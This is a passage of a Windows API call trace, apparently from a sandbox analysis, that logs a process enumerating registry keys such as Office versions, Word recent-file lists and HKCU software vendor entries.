[0085.241] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.241] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x31, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows NT", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.241] CoTaskMemFree (pv=0x2baf50)
[0085.241] CoTaskMemFree (pv=0x0)
[0085.241] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.241] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x32, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.241] CoTaskMemFree (pv=0x2baf50)
[0085.241] CoTaskMemFree (pv=0x0)
[0085.241] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.241] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x33, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script Host", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.242] CoTaskMemFree (pv=0x2baf50)
[0085.242] CoTaskMemFree (pv=0x0)
[0085.242] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.242] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x34, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Search", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.242] CoTaskMemFree (pv=0x2baf50)
[0085.242] CoTaskMemFree (pv=0x0)
[0085.242] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.242] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x35, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Sidebar", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.242] CoTaskMemFree (pv=0x2baf50)
[0085.242] CoTaskMemFree (pv=0x0)
[0085.242] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.242] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x36, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wisp", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.242] CoTaskMemFree (pv=0x2baf50)
[0085.242] CoTaskMemFree (pv=0x0)
[0085.242] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x310) returned 0x0
[0085.242] RegCloseKey (hKey=0x3a0) returned 0x0
[0085.242] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.242] CoTaskMemFree (pv=0x0)
[0085.242] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.242] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="11.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.242] CoTaskMemFree (pv=0x2baf50)
[0085.242] CoTaskMemFree (pv=0x0)
[0085.242] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.242] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="12.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.242] CoTaskMemFree (pv=0x2baf50)
[0085.242] CoTaskMemFree (pv=0x0)
[0085.242] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.242] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="14.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.243] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="15.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.243] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="16.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.243] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8.0", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.243] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Common", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.243] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.243] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneNote", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.243] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Outlook", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.243] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.243] CoTaskMemFree (pv=0x2baf50)
[0085.243] CoTaskMemFree (pv=0x0)
[0085.243] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.244] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.244] CoTaskMemFree (pv=0x2baf50)
[0085.244] CoTaskMemFree (pv=0x0)
[0085.244] RegOpenKeyExW (in: hKey=0x310, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3a0) returned 0x0
[0085.244] RegCloseKey (hKey=0x310) returned 0x0
[0085.244] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.244] CoTaskMemFree (pv=0x0)
[0085.244] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.244] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.244] CoTaskMemFree (pv=0x2baf50)
[0085.244] CoTaskMemFree (pv=0x0)
[0085.244] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.244] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.244] CoTaskMemFree (pv=0x2baf50)
[0085.244] CoTaskMemFree (pv=0x0)
[0085.244] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.244] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.244] CoTaskMemFree (pv=0x2baf50)
[0085.244] CoTaskMemFree (pv=0x0)
[0085.244] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x310) returned 0x0
[0085.245] RegCloseKey (hKey=0x3a0) returned 0x0
[0085.245] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.245] CoTaskMemFree (pv=0x0)
[0085.245] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.245] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File MRU", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.245] CoTaskMemFree (pv=0x2baf50)
[0085.245] CoTaskMemFree (pv=0x0)
[0085.245] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.245] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Options", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.245] CoTaskMemFree (pv=0x2baf50)
[0085.245] CoTaskMemFree (pv=0x0)
[0085.245] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.245] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Place MRU", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.245] CoTaskMemFree (pv=0x2baf50)
[0085.245] CoTaskMemFree (pv=0x0)
[0085.245] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x0) returned 0x2
[0085.245] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.245] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.246] CoTaskMemFree (pv=0x2baf50)
[0085.246] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.246] CoTaskMemFree (pv=0x2baf50)
[0085.246] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.246] CoTaskMemFree (pv=0x2baf50)
[0085.246] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.246] CoTaskMemFree (pv=0x2baf50)
[0085.246] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.246] CoTaskMemFree (pv=0x2baf50)
[0085.246] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.246] CoTaskMemFree (pv=0x2baf50)
[0085.246] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.246] CoTaskMemFree (pv=0x2baf50)
[0085.246] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.246] CoTaskMemFree (pv=0x2baf50)
[0085.246] CoTaskMemFree (pv=0x0)
[0085.246] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.246] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.247] CoTaskMemFree (pv=0x2baf50)
[0085.247] CoTaskMemFree (pv=0x0)
[0085.247] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.247] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.247] CoTaskMemFree (pv=0x2baf50)
[0085.247] CoTaskMemFree (pv=0x0)
[0085.247] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.247] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.247] CoTaskMemFree (pv=0x2baf50)
[0085.247] CoTaskMemFree (pv=0x0)
[0085.247] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.247] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.247] CoTaskMemFree (pv=0x2baf50)
[0085.247] CoTaskMemFree (pv=0x0)
[0085.247] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3a0) returned 0x0
[0085.247] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.247] CoTaskMemFree (pv=0x0)
[0085.247] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.247] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.247] CoTaskMemFree (pv=0x2baf50)
[0085.247] CoTaskMemFree (pv=0x0)
[0085.247] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.247] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.247] CoTaskMemFree (pv=0x2baf50)
[0085.247] CoTaskMemFree (pv=0x0)
[0085.247] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.247] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.248] CoTaskMemFree (pv=0x2baf50)
[0085.248] CoTaskMemFree (pv=0x0)
[0085.248] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.248] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.248] CoTaskMemFree (pv=0x2baf50)
[0085.248] CoTaskMemFree (pv=0x0)
[0085.248] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.248] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.248] CoTaskMemFree (pv=0x2baf50)
[0085.248] CoTaskMemFree (pv=0x0)
[0085.248] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.248] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.248] CoTaskMemFree (pv=0x2baf50)
[0085.248] CoTaskMemFree (pv=0x0)
[0085.248] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.248] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.248] CoTaskMemFree (pv=0x2baf50)
[0085.248] CoTaskMemFree (pv=0x0)
[0085.248] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.248] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.248] CoTaskMemFree (pv=0x2baf50)
[0085.248] CoTaskMemFree (pv=0x0)
[0085.248] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0085.248] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.248] CoTaskMemFree (pv=0x2baf50)
[0085.248] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.249] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
